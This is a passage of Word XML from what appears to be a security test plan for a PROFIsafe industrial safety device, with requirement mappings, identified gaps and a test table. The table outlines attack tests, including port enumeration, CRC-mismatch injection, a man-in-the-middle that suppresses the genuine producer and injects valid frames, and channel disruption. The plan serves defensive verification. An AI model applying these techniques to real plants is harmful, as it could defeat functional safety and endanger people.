        <w:t xml:space="preserve"> Critical Review &amp; Theoretical Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E48A09" w14:textId="3AD7AF1C" w:rsidR="00897779" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00897779" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48904F0A" w14:textId="28D8204D" w:rsidR="00897779" w:rsidRPr="006D5B99" w:rsidRDefault="00897779" w:rsidP="003C7816">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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897779" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 3.</w:t>
      </w:r>
      <w:r w:rsidR="00D018FD" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:r w:rsidR="00693D6E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 3.1 RE (1), CR 1.2 (secondary)</w:t>
      </w:r>
      <w:r w:rsidR="00EE7A74" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05998AB8" w14:textId="44528F03" w:rsidR="00897779" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00786FAD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00897779" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset A (Trusted Safety Function), </w:t>
      </w:r>
      <w:r w:rsidR="00786FAD" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Asset C (Integrity/Authenticity of Safety-Relevant Process Data)</w:t>
      </w:r>
      <w:r w:rsidR="003C15FB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, (Asset E (Safety Monitoring)) </w:t>
      </w:r>
      <w:r w:rsidR="00897779" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Asset F (Domain Separation)</w:t>
      </w:r>
      <w:r w:rsidR="00F85E4C" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B64B8" w14:textId="2D3E4979" w:rsidR="00897779"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897779" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spoofing, Tampering</w:t>
      </w:r>
      <w:r w:rsidR="00337CBF" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2947BA5F" w14:textId="77777777" w:rsidR="005801D9"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6B9AEE8" w14:textId="21F17BDF"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Black-channel architecture</w:t>
      </w:r>
      <w:r w:rsidR="00785C21" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00706D72" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> COM (CPU3) is non-safety (QM) and only tunnels the FSCP frame; the safety logic and the PROFIsafe consumer run on the SCPU (SRIO </w:t>
      </w:r>
      <w:r w:rsidR="00F24B63" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>categorization</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, black-channel principle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77B5B2" w14:textId="57719855"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Consumer-ID / F_Dest_Add check</w:t>
      </w:r>
      <w:r w:rsidR="00785C21" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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4-byte CRC + CRC-Seed24/32</w:t>
      </w:r>
      <w:r w:rsidR="00785C21" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detects accidental/most malicious payload modification of the cyclic frame (SRIO-2998).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA0C9A" w14:textId="5EE0C3B7"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 xml:space="preserve">F_WD_Time watchdog + consecutive number </w:t>
      </w:r>
      <w:r w:rsidR="00785C21" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> passivation (CR 3.6)</w:t>
      </w:r>
      <w:r w:rsidR="00785C21" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00761122" w:rsidP="00706D72">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Environmental control (CCSC-2)</w:t>
      </w:r>
      <w:r w:rsidR="00416953" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Safe zone behind a firewall” (SRIO-9402). This is an organisational/compensating control, not a device function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA69149" w14:textId="49FF4487" w:rsidR="00826929" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC84C65" w14:textId="3E6BC46A" w:rsidR="005801D9" w:rsidRPr="006D5B99" w:rsidRDefault="005801D9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1 (device-level, TESTABLE)</w:t>
      </w:r>
      <w:r w:rsidR="00AF6F63" w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="005801D9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">G-2 (environmental, </w:t>
      </w:r>
      <w:r w:rsidR="007B238D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>boundary only</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A75363" w:rsidRPr="006D5B99">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138E48F" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00CB3968" w:rsidP="00484325">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00A75363" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echnical refinement: a naive side-injection of a valid replayed frame while the genuine producer is still active does</w:t>
      </w:r>
      <w:r w:rsidR="005F30A2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not</w:t>
      </w:r>
      <w:r w:rsidR="00A75363" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> succeed</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A75363" w:rsidRPr="006D5B99">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w:t>
      </w:r>
      <w:r w:rsidR="008C0C7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>characterize</w:t>
      </w:r>
      <w:r w:rsidR="00A75363" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> this boundary; it cannot close it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B36B0A" w14:textId="77777777" w:rsidR="00484325" w:rsidRPr="006D5B99" w:rsidRDefault="00484325" w:rsidP="00484325">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675EA01C" w14:textId="77777777" w:rsidR="007B238D" w:rsidRPr="006D5B99" w:rsidRDefault="007B238D" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8EA872" w14:textId="77777777" w:rsidR="007B238D" w:rsidRPr="006D5B99" w:rsidRDefault="007B238D" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0955C8" w14:textId="77777777" w:rsidR="007B238D" w:rsidRPr="006D5B99" w:rsidRDefault="007B238D" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239295B2" w14:textId="7B8F5CED" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r w:rsidR="00FF7917" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C3ED4" w14:textId="59667FFD" w:rsidR="00DB074F" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="0048575E" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707FD58E"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330AF3B"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DBF5402"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2006A805" w14:textId="77777777" w:rsidR="0048575E" w:rsidRPr="006D5B99"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7F5798" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="007F5798" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5397CD4C" w14:textId="77777777" w:rsidR="000A3B23"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Baseline PROFIsafe exchange with correct F_Dest_Add; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CF0318A" w14:textId="741B3A48" w:rsidR="007F5798" w:rsidRPr="006D5B99"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qualifier = good, outputs follow control byte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45A94B88" w14:textId="5CB5D121"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implementation of CR 3.1 in normal operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC3766D" w14:textId="69B9C25B"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Requirements-based verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07A2FB28" w14:textId="393165FA" w:rsidR="007F5798" w:rsidRPr="006D5B99"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7F5798" w:rsidRPr="006D5B9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6D5B99" w:rsidRDefault="007F5798" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D6F8D51" w14:textId="7F942872" w:rsidR="007F5798" w:rsidRPr="006D5B9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Enumerate what a connecting device reaches on the DUT (services/ports on the non-safety path) vs. the approved matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B8D111B" w14:textId="7A0B3FB6"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Attack-surface of the non-safety path = evidence for Gap G-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FD339D7" w14:textId="77777777" w:rsidR="00626509"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§4.2/4.3; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD5E085" w14:textId="47E10D97" w:rsidR="007F5798" w:rsidRPr="006D5B9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framework CM-001 (Nmap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5113327F" w14:textId="505028C5" w:rsidR="007F5798" w:rsidRPr="006D5B9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7F5798" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="007F5798" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="645CCA75" w14:textId="0ACB17FC"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CRC-mismatch injection: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAB8799" w14:textId="77777777" w:rsidR="0043440A"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mis-addressed telegram, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2307805E" w14:textId="56CFDF04" w:rsidR="007F5798" w:rsidRPr="006D5B99"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bit-flipped payload/CRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71D44846" w14:textId="2164A914" w:rsidR="007F5798" w:rsidRPr="006D5B99"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Effectiveness of CRC + consumer-ID verification </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> passivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B5E2BC0" w14:textId="446E3372" w:rsidR="005238DC"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T0842/</w:t>
            </w:r>
            <w:r w:rsidR="00730417" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1692</w:t>
            </w:r>
            <w:r w:rsidR="00D9486D" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.002</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E5931F" w14:textId="53E8219B" w:rsidR="007F5798" w:rsidRPr="006D5B99"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§5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D4A0978" w14:textId="3D15C8FA" w:rsidR="007F5798" w:rsidRPr="006D5B99"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D53221" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0043440A" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E46E851" w14:textId="5D4B2161" w:rsidR="00D53221" w:rsidRPr="006D5B99"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In-path MITM boundary: suppress genuine producer, take over consecutive number, inject valid-CRC frame</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="114B41AC" w14:textId="223E93F1"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Demonstrates the true residual boundary of G-2 (documented, not scored as device FAIL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F231996" w14:textId="495161B8" w:rsidR="00D53221" w:rsidRPr="006D5B99"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ATT&amp;CK for ICS T0830; PROFIsafe theory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50994883" w14:textId="32E94B3A" w:rsidR="00D53221" w:rsidRPr="006D5B99"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7F5798" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0043440A" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79857C82" w14:textId="77777777" w:rsidR="00561999"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Disrupt the black channel &gt; F_WD_Time; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26CB53B5" w14:textId="2EF148E0" w:rsidR="007F5798" w:rsidRPr="006D5B99"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passivation + acknowledged re-integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6157064B" w14:textId="7A0CABB8" w:rsidR="007F5798" w:rsidRPr="006D5B99"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Connection-induced disruption resolves to the safe state (fail-safe outcome of RQ-001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62994648" w14:textId="55BE52A0" w:rsidR="007F5798" w:rsidRPr="006D5B99"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T0814; PROFIsafe watchdog theory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D2A2C99" w14:textId="3159E699" w:rsidR="007F5798" w:rsidRPr="006D5B99"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bl>
    <w:p w14:paraId="66A09378" w14:textId="77777777" w:rsidR="00EC4BDF" w:rsidRPr="006D5B99" w:rsidRDefault="00EC4BDF" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4250E11E" w14:textId="77777777" w:rsidR="00864878" w:rsidRPr="006D5B99" w:rsidRDefault="00864878" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4735E165" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5D79B9" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB8C1A3" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DEEABB" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E169AF0" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599B01C6" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56240AB3" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAAEDE0" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD97381" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC7DDA6" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E80C9D" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6A7B43" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8B7537" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
